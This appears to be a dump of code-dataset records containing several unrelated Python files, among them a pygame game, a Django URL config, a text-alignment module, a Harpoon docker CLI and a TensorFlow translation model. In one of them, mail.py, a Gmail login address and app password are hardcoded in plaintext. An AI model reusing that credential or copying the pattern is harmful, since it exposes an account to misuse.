puntuación\n\n #Fuente de texto\n fuente = pygame.font.SysFont(\"monospace\", 64)\n\n #Carga la música\n pygame.mixer.init()\n pygame.mixer.music.load(\"musicaFondo.mp3\")\n pygame.mixer.music.play(-1)\n efectoSonido = pygame.mixer.Sound(\"sonidoConejo.wav\")\n\n\n while not termina: # Ciclo principal, Mientras la variable termina sea False, el ciclo se repite automáticamente\n # Procesa los eventos que recibe\n for evento in pygame.event.get():\n if evento.type == pygame.QUIT: # El usuario hizo click en el botón de salir\n termina = True # Queremos terminar el ciclo\n\n #Estado jugando\n elif estado == JUGANDO and evento.type == pygame.KEYDOWN:\n xPersonaje, yPersonaje, anchoPersonaje, altoPersonaje = spritePersonaje.rect\n xObstaculo, yObstaculo, anchoObstaculo, altoObstaculo = spriteObstaculo.rect\n if evento.key == pygame.K_UP:\n #Hace cumplir que no pase por el obstáculo\n if xPersonaje >= xObstaculo-anchoPersonaje and xPersonaje <= xObstaculo+anchoObstaculo and yPersonaje-altoPersonaje*2 <= yObstaculo and yPersonaje >= yObstaculo+altoObstaculo:\n pass\n elif yPersonaje-altoPersonaje <= 0:\n pass\n else:\n spritePersonaje.rect.bottom -= 100\n elif evento.key == pygame.K_DOWN:\n # Hace cumplir que no pase por el obstáculo\n if xPersonaje >= xObstaculo-anchoPersonaje and 
xPersonaje <= xObstaculo+anchoObstaculo and yPersonaje+altoPersonaje*2 >= yObstaculo and yPersonaje <= yObstaculo:\n pass\n elif yPersonaje+altoPersonaje >= ALTO:\n pass\n else:\n spritePersonaje.rect.bottom += 100\n elif evento.key == pygame.K_RIGHT:\n # Hace cumplir que no pase por el obstáculo\n if xPersonaje+anchoPersonaje*2 >= xObstaculo and xPersonaje+anchoPersonaje <= xObstaculo+anchoObstaculo and yPersonaje+altoPersonaje >= yObstaculo and yPersonaje <= yObstaculo:\n pass\n elif xPersonaje+anchoPersonaje*2 >= ANCHO:\n pass\n else:\n spritePersonaje.rect.left += 65\n elif evento.key == pygame.K_LEFT:\n # Hace cumplir que no pase por el obstáculo\n if xPersonaje+anchoPersonaje >= xObstaculo and xPersonaje-anchoPersonaje*2 <= xObstaculo+anchoObstaculo and yPersonaje+altoPersonaje >= yObstaculo and yPersonaje <= yObstaculo:\n pass\n elif xPersonaje-anchoPersonaje*2 <= -49:\n pass\n else:\n spritePersonaje.rect.left -= 65\n\n\n elif estado == PUNTAJES and evento.type == pygame.MOUSEBUTTONUP:\n xMouse, yMouse = pygame.mouse.get_pos() # Captura las coordenadas en las que hiciste click\n xHome = ANCHO - 120\n yHome = ALTO - 100\n xIntentar = ANCHO - 220\n yIntentar = ALTO - 80\n #Condición si el usuario hace click en home\n if xMouse >= xHome and xMouse <= xHome + 120 and yMouse >= yHome and yMouse <= yHome + 100: # Condicion para el boton\n nuevoTiempo = 0\n spritePersonaje.rect = imgPersonaje.get_rect()\n spritePersonaje.rect.left = 350\n spritePersonaje.rect.bottom = 300\n listaEnemigos.clear()\n listaEnemigos2.clear()\n spriteObstaculo.rect.left = randint(70, ANCHO - 70)\n spriteObstaculo.rect.bottom = int(randint(80, ALTO - 80) / 100 + 0.5) * 100\n spriteBonus.rect.left = randint(80, ANCHO - 80)\n spriteBonus.rect.bottom = int(randint(80, ALTO - 80) / 100 + 0.5) * 100\n estado = MENU\n #Condición si hace click en salir\n elif xMouse >= 0 and xMouse <= 221 and yMouse >= ALTO-100 and yMouse <= ALTO:\n termina = True\n #Condición si hace click en reintentar\n elif xMouse >= xIntentar and xMouse <= xIntentar + ANCHO - 220 and yMouse >= yIntentar and yMouse <= yIntentar + ALTO - 80:\n nuevoTiempo = 0\n spritePersonaje.rect = imgPersonaje.get_rect()\n spritePersonaje.rect.left = 350\n spritePersonaje.rect.bottom = 300\n listaEnemigos.clear()\n listaEnemigos2.clear()\n spriteObstaculo.rect.left = randint(70, ANCHO - 70)\n spriteObstaculo.rect.bottom = int(randint(80, ALTO - 80) / 100 + 0.5) * 100\n spriteBonus.rect.left = randint(80, ANCHO - 80)\n spriteBonus.rect.bottom = int(randint(80, ALTO - 80) / 100 + 0.5) * 100\n estado = JUGANDO\n\n\n #Probar botones del botón final\n elif estado == FINAL and evento.type == pygame.MOUSEBUTTONUP:\n xMouse, yMouse = pygame.mouse.get_pos() # Captura las coordenadas en las que hiciste click\n # Preguntar si solto el mouse dentro del boton de home\n xHome = ANCHO - 120\n yHome = ALTO - 100\n xBotonSalir = ANCHO//2 - 110\n yBotonSalir = ALTO//3 + 75\n xIntentar = ANCHO - 220\n yIntentar = ALTO - 80\n #Condición para establecer el juego en 0\n if xMouse >= xHome and xMouse <= xHome + 120 and yMouse >= yHome and yMouse <= yHome + 100: # Condicion para el boton\n nuevoTiempo = 0\n spritePersonaje.rect = imgPersonaje.get_rect()\n spritePersonaje.rect.left = 350\n spritePersonaje.rect.bottom = 300\n listaEnemigos.clear()\n listaEnemigos2.clear()\n spriteObstaculo.rect.left = randint(70, ANCHO - 70)\n spriteObstaculo.rect.bottom = int(randint(80, ALTO - 80) / 100 + 0.5) * 100\n spriteBonus.rect.left = randint(80, ANCHO-80)\n spriteBonus.rect.bottom = 
int(randint(80, ALTO-80) / 100 + 0.5) * 100\n estado = MENU\n # Condición para click en botón salir\n elif xMouse >= xBotonSalir and xMouse <= xBotonSalir+221 and yMouse >= yBotonSalir and yMouse <= yBotonSalir +100:\n termina = True\n # Condición para establecer el juego en 0\n elif xMouse >= xIntentar and xMouse <= xIntentar+ANCHO-220 and yMouse >= yIntentar and yMouse <= yIntentar+ALTO-80:\n nuevoTiempo = 0\n spritePersonaje.rect = imgPersonaje.get_rect()\n spritePersonaje.rect.left = 350\n spritePersonaje.rect.bottom = 300\n listaEnemigos.clear()\n listaEnemigos2.clear()\n spriteObstaculo.rect.left = randint(70, ANCHO - 70)\n spriteObstaculo.rect.bottom = int(randint(80, ALTO - 80) / 100 + 0.5) * 100\n spriteBonus.rect.left = randint(80, ANCHO - 80)\n spriteBonus.rect.bottom = int(randint(80, ALTO-80) / 100 + 0.5) * 100\n estado = JUGANDO\n\n #Estado menú\n elif estado == MENU and evento.type == pygame.MOUSEBUTTONUP:\n xMouse, yMouse = pygame.mouse.get_pos() #Captura las coordenadas en las que hiciste click\n # Preguntar si solto el mouse dentro del boton\n xBoton = ANCHO//2-110\n yBoton = ALTO//3-50\n xBotonSalir = ANCHO//2-110\n yBotonSalir = ALTO//3+100\n xBotonPuntajes = ANCHO//2-110\n yBotonPuntajes = ALTO-160\n #Condición si hace click en jugar\n if xMouse >= xBoton and xMouse <= xBoton+220 and yMouse >= yBoton and yMouse <= yBoton+100: #Condicion para el boton\n estado = JUGANDO\n #Condición si hace click en salir\n elif xMouse >= xBotonSalir and xMouse <= xBotonSalir+220 and yMouse >= yBotonSalir and yMouse <= yBotonSalir+100:\n termina = True\n #Condición si hace click en highscore\n elif xMouse >= xBotonPuntajes and xMouse <= xBotonPuntajes+220 and yMouse >= yBotonPuntajes and yMouse <= yBotonPuntajes+100:\n estado = PUNTAJES\n\n\n #Estado jugando\n if estado == JUGANDO:\n ventana.blit(imgFondoJugando, (0, 0))\n #Tiempo real\n nuevoTiempo += 1 / 40\n #Tiempo de regeneración\n timer += 1 / 40\n #Ciclo para que se generen los cazadores\n if timer >= 1:\n timer = 0\n\n #Carga los enemigos\n spriteEnemigo = pygame.sprite.Sprite()\n spriteEnemigo.image = imgEnemigo\n spriteEnemigo.rect = imgEnemigo.get_rect()\n spriteEnemigo.rect.left = randint(0, ANCHO) + ANCHO\n spriteEnemigo.rect.bottom = int(randint(0, ALTO)/100+0.5) * 100\n listaEnemigos.append(spriteEnemigo)\n\n spriteEnemigo2 = pygame.sprite.Sprite()\n spriteEnemigo2.image = imgEnemigo2\n spriteEnemigo2.rect = imgEnemigo2.get_rect()\n spriteEnemigo2.rect.left = -randint(0, ANCHO) - ANCHO\n spriteEnemigo2.rect.bottom = int(randint(0, ALTO)/100+0.5) * 100\n listaEnemigos2.append(spriteEnemigo2)\n\n moverEnemigos(listaEnemigos,listaEnemigos2)\n dibujarPersonaje(ventana, spritePersonaje)\n dibujarEnemigos(ventana, listaEnemigos, listaEnemigos2)\n dibujarObstaculo(ventana, spriteObstaculo)\n #Imprime el tiempo\n texto = fuente.render(\"Tiempo %d\" % int(nuevoTiempo), 1, ROJO)\n ventana.blit(texto, (ANCHO // 2 + 90, 20))\n #Verifica si chocaron\n if verificarColision(listaEnemigos, listaEnemigos2, spritePersonaje) == True:\n efectoSonido.play()\n estado = FINAL\n #Verifica si agarró el bonus\n elif agregarBonus(spriteBonus,spritePersonaje) == True:\n nuevoTiempo = nuevoTiempo+2\n #Genera el bonus\n elif nuevoTiempo >= 5 or nuevoTiempo >= 10 or nuevoTiempo >= 15:\n dibujarBonus(ventana, spriteBonus)\n\n #Estado de menú principal\n elif estado == MENU:\n ventana.blit(imgFondoInicio, (0,0))\n dibujarMenu(ventana, imgBotonJugar, imgBotonSalir, imgHighscore)\n\n #Estado de highscore\n elif estado == PUNTAJES:\n 
ventana.blit(imgFondoInicio,(0,0))\n ventana.blit(imgHome, (ANCHO - 120, ALTO - 100))\n ventana.blit(imgBotonSalir, (0, ALTO -100))\n ventana.blit(imgIntento2, (ANCHO - 220, ALTO - 80))\n\n #Se lee el archivo que contiene el puntaje anterior\n puntajeAnterior = open(\"Puntajes.txt\", \"r\")\n primerLinea = puntajeAnterior.readline()\n puntaje = str(primerLinea)\n score = fuente.render(\"Mejor puntaje: %s segundos\" % puntaje, 1, ROJO)\n ventana.blit(score, (100,ALTO//2))\n puntajeAnterior.close()\n\n\n #Estado de menú final\n elif estado == FINAL:\n ventana.blit(imgFondoFinal, (0,0))\n tiempo = fuente.render(str(\"Tu puntuación es: %d\" % int(nuevoTiempo)), 1, ROJO)\n dibujarMenuFinal(ventana, imgBotonSalir, imgHome, imgIntento2,tiempo)\n\n #Leo el archivo donde esta el puntaje anterior\n puntajeAnterior = open(\"Puntajes.txt\", \"r\")\n primerLinea = puntajeAnterior.readline()\n puntaje = int(primerLinea)\n puntajeActual = nuevoTiempo // 1\n #Comparo si el actual es mayor que el anterior\n if puntajeActual > puntaje:\n mejorScore = open(\"Puntajes.txt\", \"w\")\n mejorScore.write(\"%d\" % puntajeActual)\n mejorScore.close()\n puntajeAnterior.close()\n\n\n pygame.display.flip() # Actualiza trazos (Si no llamas a esta función, no se dibuja)\n reloj.tick(40) # 40 frames por segundo\n\n # Después del ciclo principal\n pygame.quit() # termina pygame\n\n# Función principal, aquí resuelves el problema\ndef main():\n dibujar()\n\n# Llamas a la función principal\nmain()","sub_path":"Juego.py","file_name":"Juego.py","file_ext":"py","file_size_in_byte":21016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"439153172","text":"\n\ndef readData(file_path):\n file=open(file_path)\n vertexs=[]\n vnorms=[]\n line=file.readline()\n while line:\n line=line.split()\n if line[0]=='facet':\n vnorms.append(list(map(float,[line[2],line[3],line[4]])))\n if line[0]=='vertex':\n vertexs.append(list(map(float,[line[1],line[2],line[3]])))\n line=file.readline()\n file.close()\n return vertexs,vnorms\n\n\nif __name__ == \"__main__\":\n vertexs, vnorms=readData('gear.stl')\n print(vertexs[0][0])","sub_path":"system/readData.py","file_name":"readData.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"358439761","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import *\nfrom django.views.generic import *\n\nfrom consultas.views import *\n\nurlpatterns = (\n url(r'atestado/(?P\\d+)/$', atestado),\n url(r'encaminhamento/(?P\\d+)/$', encaminhamento),\n url(r'evolucao/(?P\\d+)/$', evolucao),\n url(r'gestantes/$', gestantes, name=\"gestantes\"),\n url(r'prescricao/(?P\\d+)/$', prescricao),\n url(r'producao_mensal/$', producao_mensal, name=\"producao_mensal\"),\n url(r'producao_diaria/$', producao_diaria, name=\"producao_diaria\"),\n url(r'solicitacao/(?P\\d+)/$', solicitacao),\n url(r'complemento/(?P\\d+)/$', get_complemento),\n url(r'profissional/$', get_profissional),\n url(r'procedimento/$', get_procedimento),\n url(r'solicitacaoModelo/$', solicitacaoModelo),\n url(r'prescricaoModelo/$', prescricaoModelo),\n url(r'medicacao/(?P\\d+)/$', get_medicacao),\n)\n","sub_path":"consultas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"62437874","text":"import sys\nimport math\nfrom collections import deque\nimport editdistance\nimport pandas as 
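verificarColision() and agregarBonus() in Juego.py above test rectangle overlap corner by corner; pygame's own Rect.colliderect performs the same axis-aligned overlap test. A standalone sketch with made-up rectangles, shown as an alternative rather than the game's actual method:

import pygame

rabbit = pygame.Rect(340, 250, 50, 50)   # x, y, width, height
hunter = pygame.Rect(360, 260, 40, 40)
print(rabbit.colliderect(hunter))  # True: the rectangles overlap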
pd\n\n\ndef _print_table(tbl, m, n):\n for i in range(0, m + 1):\n for j in range(0, n + 1):\n sys.stdout.write(\"%s/%s\" % tbl[(i, j)])\n sys.stdout.write('\\t')\n sys.stdout.write('\\n')\n\n\ndef _edit_distance(tokens1, tokens2, weight_fns):\n tbl = {}\n tbl[(0, 0)] = (0, 'n')\n\n m = len(tokens1)\n n = len(tokens2)\n\n for i in range(0, m):\n tbl[(i + 1, 0)] = (i + 1, 'd')\n \n for j in range(0, n):\n tbl[(0, j + 1)] = (j + 1, 'i')\n\n if m == 0 or n == 0:\n return tbl\n\n for i in range(0, m):\n for j in range(0, n):\n if (tokens1[i] == tokens2[j]):\n edit_cost = tbl[(i + 1, j + 1)] = (tbl[(i, j)][0], 'n')\n else:\n edit_cost = (tbl[(i, j)][0] + weight_fns['e'](tokens1[i], tokens2[j]), 'e')\n insert_cost = (tbl[(i, j + 1)][0] + weight_fns['d'](tokens1[i]), 'd')\n delete_cost = (tbl[(i + 1, j)][0] + weight_fns['i'](tokens2[j]), 'i')\n # print(tokens1[i])\n # print(tokens2[j])\n # print(f'e: {edit_cost}\\ni: {insert_cost}\\nd: {delete_cost}')\n # print()\n tbl[(i + 1, j + 1)] = min([insert_cost, delete_cost, edit_cost], key = lambda t: t[0])\n\n return tbl\n\n\ndef case_aware_editdistance(x,y):\n basic = editdistance.eval(x, y)\n case_insensitive = editdistance.eval(x.lower(), y.lower())\n if basic > case_insensitive:\n return case_insensitive+((basic-case_insensitive)*0.001)\n else:\n return basic\n\n\n\ndef _gen_alignments(tokens1, tokens2):\n weight_fns = {\n 'e': lambda x, y: (case_aware_editdistance(x, y) * 2 / max(len(x), len (y)) ) ,\n # 'e': lambda x, y: (editdistance.eval(x, y) * 2 / max(len(x), len (y)) ) ,\n 'd': lambda x: 1,\n 'i': lambda x: 1\n }\n\n dist_table = _edit_distance(tokens1, tokens2, weight_fns)\n \n m = len(tokens1)\n n = len(tokens2)\n\n alignments = deque()\n\n i = m\n j = n\n\n while i != 0 or j != 0:\n op = dist_table[(i, j)][1]\n cost = dist_table[(i, j)][0]\n\n if op == 'n' or op == 'e':\n alignments.appendleft((i, j, op, cost))\n i -= 1\n j -= 1\n \n elif op == 'i':\n alignments.appendleft((None, j, 'i', cost))\n j -= 1\n\n elif op == 'd':\n alignments.appendleft((i, None, 'd', cost))\n i -= 1\n\n return alignments\n\n\ndef align_words(s1, s2):\n s1_tokens = s1.split()\n s2_tokens = s2.split()\n\n alignments = _gen_alignments(s1_tokens, s2_tokens)\n\n return list(alignments)\n\ndef align_wordsDF(s1,s2,blanks='_',bckf=True):\n \n # print(s1)\n # print(s2)\n \n s1toks = s1.split()\n s2toks = s2.split()\n a = align_words(s1,s2)\n\n \n \n df = {}\n for tidx in range(len(a)):\n s1idx = a[tidx][0]\n s2idx = a[tidx][1]\n\n if s1idx:\n s1tok = s1toks[s1idx-1]\n else:\n s1tok = blanks\n\n if s2idx:\n s2tok = s2toks[s2idx-1]\n else:\n if bckf==True:\n s2tok=s1toks[s1idx-1]\n elif bckf==False:\n s2tok = blanks\n else:\n raise Exception('backoff must be True or False')\n df[tidx] = (s1tok,s2tok,a[tidx][2],a[tidx][3])\n # print(f'{tidx}\\t{s1tok}\\t{s2tok}\\t{a[tidx][2]}')\n return pd.DataFrame(df).T\n\n\ndef cross_align(s1,s2,blanks='_',bckf=True):\n return ' '.join(align_wordsDF(s1,s2,blanks=blanks,bckf=bckf)[1].values)","sub_path":"src/alignment.py","file_name":"alignment.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"328472691","text":"#!/usr/bin/python\n\nimport sys\nimport string\n\nsubjectIdentifier = \"Subject: \"\n\nfor line in sys.stdin:\n\tif line.startswith(subjectIdentifier):\n\t\tline = line.replace(subjectIdentifier, \"\")\n\t\twords = line.split()\n\t\tfor word in words:\n\t\t\tword = word.strip(string.punctuation).strip()\n\t\t\tif len(word) > 
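The case_aware_editdistance() weighting in alignment.py is easiest to see in isolation: a case-only difference is discounted to a small fraction so it ranks below a genuine one-character edit. A standalone demo (requires the third-party editdistance package):

import editdistance

def case_aware(x, y):
    basic = editdistance.eval(x, y)
    folded = editdistance.eval(x.lower(), y.lower())
    # case-only edits cost 0.001 each instead of 1
    return folded + (basic - folded) * 0.001 if basic > folded else basic

print(case_aware("Word", "word"))  # 0.001
print(case_aware("word", "ward"))  # 1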
0:\n\t\t\t\tprint(word.lower().strip())","sub_path":"mapper_2.py","file_name":"mapper_2.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"121047661","text":"import smtplib\nimport json\n\naccounts_path = './data/accounts.json'\n\ndef get_target_account(email):\n target_account = None\n with open(accounts_path, \"r+\") as f:\n accounts = json.load(f)\n for account in accounts:\n if account[\"email\"] == email:\n target_account = account\n break\n if target_account == None:\n accounts.append({'email': email, 'notified_products_urls': []})\n f.seek(0)\n json.dump(accounts, f)\n f.truncate()\n target_account = accounts[-1]\n\n return target_account\n\n\ndef update_accounts_json(email, urls):\n with open(accounts_path, \"r+\") as f:\n accounts = json.load(f)\n for account in accounts:\n if account[\"email\"] == email:\n account[\"notified_products_urls\"] = account[\"notified_products_urls\"] + urls\n break\n f.seek(0)\n json.dump(accounts, f)\n f.truncate()\n\n\ndef update_urls_to_send(urls_to_send, urls, target_account):\n for url in urls:\n if url not in target_account['notified_products_urls']:\n urls_to_send.append(url)\n\n\ndef send_mail(urls, email):\n urls_to_send = []\n target_account = get_target_account(email)\n update_urls_to_send(urls_to_send, urls, target_account)\n\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n\n server.login('throwaway.47192883@gmail.com', 'oqyriwifawroqvvv')\n subject = 'price fell down'\n body = 'check the amazon links:' + \" \".join(urls_to_send)\n\n msg = f\"Subject: {subject}\\n\\n{body}\"\n\n if len(urls_to_send) > 0:\n server.sendmail(\n 'originjdel@gmail.com',\n email,\n msg\n )\n update_accounts_json(email, urls_to_send)\n\n print(f'Hey, {len(urls_to_send)} emails have been sent')\n\n server.quit()\n","sub_path":"src/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"308983158","text":"\"\"\"\nThis is where the mainline sits and is responsible for setting up the logging,\nthe argument parsing and for starting up Harpoon.\n\"\"\"\n\nfrom __future__ import print_function\n\nfrom harpoon.errors import BadOption, BadDockerConnection\nfrom harpoon.overview import Overview\n\nfrom rainbow_logging_handler import RainbowLoggingHandler\nfrom input_algorithms.spec_base import NotSpecified\nfrom docker.client import Client as DockerClient\nfrom delfick_error import DelfickError\nimport requests\nimport argparse\nimport logging\nimport docker\nimport ssl\nimport sys\nimport os\n\nlog = logging.getLogger(\"harpoon.executor\")\n\ndef setup_logging(verbose=False, silent=False, debug=False):\n log = logging.getLogger(\"\")\n handler = RainbowLoggingHandler(sys.stderr)\n handler._column_color['%(asctime)s'] = ('cyan', None, False)\n handler._column_color['%(levelname)-7s'] = ('green', None, False)\n handler._column_color['%(message)s'][logging.INFO] = ('blue', None, False)\n handler.setFormatter(logging.Formatter(\"%(asctime)s %(levelname)-7s %(name)-15s %(message)s\"))\n log.addHandler(handler)\n log.setLevel([logging.INFO, logging.DEBUG][verbose or debug])\n if silent:\n log.setLevel(logging.ERROR)\n\n logging.getLogger(\"requests\").setLevel([logging.CRITICAL, logging.ERROR][verbose or debug])\n return handler\n\nclass CliParser(object):\n \"\"\"Knows what argv looks like\"\"\"\n def 
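mail.py above rewrites accounts.json in place with the r+/seek(0)/truncate() idiom; the same read-modify-write pattern standalone, with a hypothetical temp path:

import json

path = "/tmp/accounts.json"
with open(path, "w") as f:
    json.dump([{"email": "a@example.com", "notified_products_urls": []}], f)

with open(path, "r+") as f:
    accounts = json.load(f)
    accounts[0]["notified_products_urls"].append("https://example.com/item")
    f.seek(0)      # rewind before rewriting
    json.dump(accounts, f)
    f.truncate()   # drop leftover bytes if the new payload is shorter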
parse_args(self, argv=None):\n \"\"\"Split the args into -- and run through our argparse.ArgumentParser\"\"\"\n if argv is None:\n argv = sys.argv[1:]\n\n argv = list(argv)\n args = []\n extras = None\n default_task = NotSpecified\n default_image = NotSpecified\n\n if argv:\n if not argv[0].startswith(\"-\"):\n default_task = argv[0]\n argv.pop(0)\n\n if argv and not argv[0].startswith(\"-\"):\n default_image = argv[0]\n argv.pop(0)\n\n while argv:\n nxt = argv.pop(0)\n if extras is not None:\n extras.append(nxt)\n elif nxt == \"--\":\n extras = []\n else:\n args.append(nxt)\n\n other_args = \"\"\n if extras:\n other_args = \" \".join(extras)\n\n parser = self.make_parser(default_task=default_task, default_image=default_image)\n args = parser.parse_args(args)\n if default_task is not NotSpecified and args.harpoon_chosen_task != default_task:\n raise BadOption(\"Please don't specify task as a positional argument and as a --task option\", positional=default_task, kwarg=args.task)\n if default_image is not NotSpecified and args.harpoon_chosen_image != default_image:\n raise BadOption(\"Please don't specify image as a positional argument and as a --image option\", positional=default_image, kwargs=args.image)\n\n return args, other_args\n\n def make_parser(self, default_task=NotSpecified, default_image=NotSpecified):\n parser = argparse.ArgumentParser(description=\"Opinionated layer around docker\")\n\n logging = parser.add_mutually_exclusive_group()\n logging.add_argument(\"--verbose\"\n , help = \"Enable debug logging\"\n , action = \"store_true\"\n )\n\n logging.add_argument(\"--silent\"\n , help = \"Only log errors\"\n , action = \"store_true\"\n )\n\n logging.add_argument(\"--debug\"\n , help = \"Debug logs\"\n , action = \"store_true\"\n )\n\n opts = {}\n if os.path.exists(\"./harpoon.yml\"):\n opts[\"default\"] = \"./harpoon.yml\"\n opts[\"required\"] = False\n else:\n opts[\"required\"] = True\n\n if \"HARPOON_CONFIG\" in os.environ:\n opts[\"default\"] = os.environ[\"HARPOON_CONFIG\"]\n del opts[\"required\"]\n parser.add_argument(\"--harpoon-config\"\n , help = \"The config file specifying what harpoon should care about\"\n , type = argparse.FileType(\"r\")\n , **opts\n )\n\n extra = {\"default\": \"list_tasks\"}\n if default_task is not NotSpecified:\n extra[\"default\"] = default_task\n parser.add_argument(\"--task\"\n , help = \"The task to run\"\n , dest = \"harpoon_chosen_task\"\n , **extra\n )\n\n parser.add_argument(\"--non-interactive\"\n , help = \"Make this non interactive\"\n , dest = \"harpoon_interactive\"\n , action = \"store_false\"\n )\n\n extra = {\"default\": \"\"}\n if default_image is not NotSpecified:\n extra[\"default\"] = default_image\n parser.add_argument(\"--image\"\n , help = \"Specify a particular image\"\n , dest = \"harpoon_chosen_image\"\n , **extra\n )\n\n command = parser.add_mutually_exclusive_group()\n\n command.add_argument(\"--command\"\n , help = \"Specify a command to run for tasks that need one\"\n )\n\n command.add_argument(\"--bash\"\n , help = \"Specify a command that will be ran as /bin/bash -c ''\"\n )\n\n parser.add_argument(\"--silent-build\"\n , help = \"Make the build process quiet\"\n , dest = \"harpoon_silent_build\"\n , action = \"store_true\"\n )\n\n parser.add_argument(\"--keep-replaced\"\n , help = \"Don't delete images that have their tag stolen by a new image\"\n , dest = \"harpoon_keep_replaced\"\n , action = \"store_true\"\n )\n\n parser.add_argument(\"--no-intervention\"\n , help = \"Don't ask to intervene broken builds\"\n , 
dest = \"harpoon_no_intervention\"\n , action = \"store_true\"\n )\n\n parser.add_argument(\"--env\"\n , help = \"Environment option to start the container with\"\n , dest = \"extra_env\"\n , action = \"append\"\n )\n\n parser.add_argument(\"--port\"\n , help = \"Specify a port to publish in the running container you make\"\n , dest = \"extra_ports\"\n , action = \"append\"\n )\n\n parser.add_argument(\"--flat\"\n , help = \"Used with the show command\"\n , dest = \"harpoon_flat\"\n , action = \"store_true\"\n )\n\n parser.add_argument(\"--ignore-missing\"\n , help = \"Used by the pull commands to ignore if an image doesn't exist\"\n , dest = \"harpoon_ignore_missing\"\n , action = \"store_true\"\n )\n\n return parser\n\n def interpret_args(self, argv, no_docker=False):\n \"\"\"Parse argv, do some transformation and return cli_args suitable for Overview\"\"\"\n args, extra = CliParser().parse_args(argv)\n\n cli_args = {\"harpoon\": {}}\n for key, val in sorted(vars(args).items()):\n if key.startswith(\"harpoon_\"):\n cli_args[\"harpoon\"][key[8:]] = val\n else:\n cli_args[key] = val\n cli_args[\"harpoon\"][\"extra\"] = extra\n\n if not no_docker:\n cli_args[\"harpoon\"][\"docker_context\"] = docker_context()\n\n for key in ('bash', 'command'):\n if cli_args[key] is None:\n cli_args[key] = NotSpecified\n\n return args, cli_args\n\ndef docker_context():\n \"\"\"Make a docker context\"\"\"\n host = os.environ.get('DOCKER_HOST')\n cert_path = os.environ.get('DOCKER_CERT_PATH')\n tls_verify = os.environ.get('DOCKER_TLS_VERIFY')\n\n options = {\"timeout\": 60}\n if host:\n options['base_url'] = (host.replace('tcp://', 'https://') if tls_verify else host)\n\n if tls_verify and cert_path:\n options['tls'] = docker.tls.TLSConfig(\n verify = True\n , ca_cert = os.path.join(cert_path, 'ca.pem')\n , client_cert = (os.path.join(cert_path, 'cert.pem'), os.path.join(cert_path, 'key.pem'))\n , ssl_version = ssl.PROTOCOL_TLSv1\n , assert_hostname = False\n )\n\n client = DockerClient(**options)\n try:\n info = client.info()\n log.info(\"Connected to docker daemon\\tdriver=%s\\tkernel=%s\", info[\"Driver\"], info[\"KernelVersion\"])\n except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as error:\n raise BadDockerConnection(base_url=options['base_url'], error=error)\n return client\n\ndef main(argv=None):\n try:\n args, cli_args = CliParser().interpret_args(argv)\n handler = setup_logging(verbose=args.verbose, silent=args.silent, debug=args.debug)\n Overview(configuration_file=args.harpoon_config.name, logging_handler=handler).start(cli_args)\n except DelfickError as error:\n print(\"\")\n print(\"!\" * 80)\n print(\"Something went wrong! 
-- {0}\".format(error.__class__.__name__))\n print(\"\\t{0}\".format(error))\n if CliParser().parse_args(argv)[0].debug:\n raise\n sys.exit(1)\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n pass\n\n","sub_path":"harpoon/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":9091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"22383077","text":"# coding: utf-8\nimport tensorflow as tf \nfrom batch import MakeDataset, MakeSrcTrgDataset\n\nSRC_TRAIN_DATA = '../data/train.en'\nTRG_TRAIN_DATA = '../data/train.zh'\n\nCHECKPOINT_PATH = '../log/'\n\nHIDDEN_SIZE = 1024\nNUM_LAYERS = 2\nSRC_VOCAB_SIZE = 10000\nTRG_VOCAB_SIZE = 4000\nBATCH_SIZE = 100\nNUM_EPOCH = 5\nKEEP_PROB = 0.8\nMAX_GRAD_NORM = 5\nSHARE_EMB_SOFTMAX = True\n\nclass NMTModel(object):\n\t\"\"\"docstring for NMTModel\"\"\"\n\tdef __init__(self):\n\n\t\t''' Define the encoder and decoder \n\t\t'''\n\t\tself.enc_cell = tf.nn.rnn_cell.MultiRNNCell(\n\t\t\t[tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_SIZE) for _ in range(NUM_LAYERS)])\n\t\tself.dec_cell = tf.nn.rnn_cell.MultiRNNCell(\n\t\t\t[tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_SIZE) for _ in range(NUM_LAYERS)])\n\n\t\t''' Define word embeddings of the source and target language\n\t\t'''\n\t\tself.src_embedding = tf.get_variable('src_emb', [SRC_VOCAB_SIZE, HIDDEN_SIZE])\n\t\tself.trg_embedding = tf.get_variable('trg_emb', [TRG_VOCAB_SIZE, HIDDEN_SIZE])\n\n\t\t''' Define the softmax layer vars\n\t\t'''\n\t\tif SHARE_EMB_SOFTMAX:\n\t\t\tself.softmax_weight = tf.transpose(self.trg_embedding)\n\t\telse:\n\t\t\tself.softmax_weight = tf.get_variable(\"weight\", [HIDDEN_SIZE, TRG_VOCAB_SIZE])\n\t\tself.softmax_bias = tf.get_variable(\"softmax_bias\", [TRG_VOCAB_SIZE])\n\n\t# def test(self, a):\n\t# \tprint(a)\n\n\t''' Construct the forward compute graph\n\t'''\n\tdef forward(self, src_input, src_size, trg_input, trg_label, trg_size):\n\t\tbatch_size = tf.shape(src_input)[0]\n\n\t\t''' Get source and target input word embeddings\n\t\t'''\n\t\t# convert the src_input and trg_input to embeddings\n\t\tsrc_emb = tf.nn.embedding_lookup(self.src_embedding, src_input)\n\t\ttrg_emb = tf.nn.embedding_lookup(self.trg_embedding, trg_input)\n\n\t\t# apply dropout on word embeddings\n\t\tsrc_emb = tf.nn.dropout(src_emb, KEEP_PROB)\n\t\ttrg_emb = 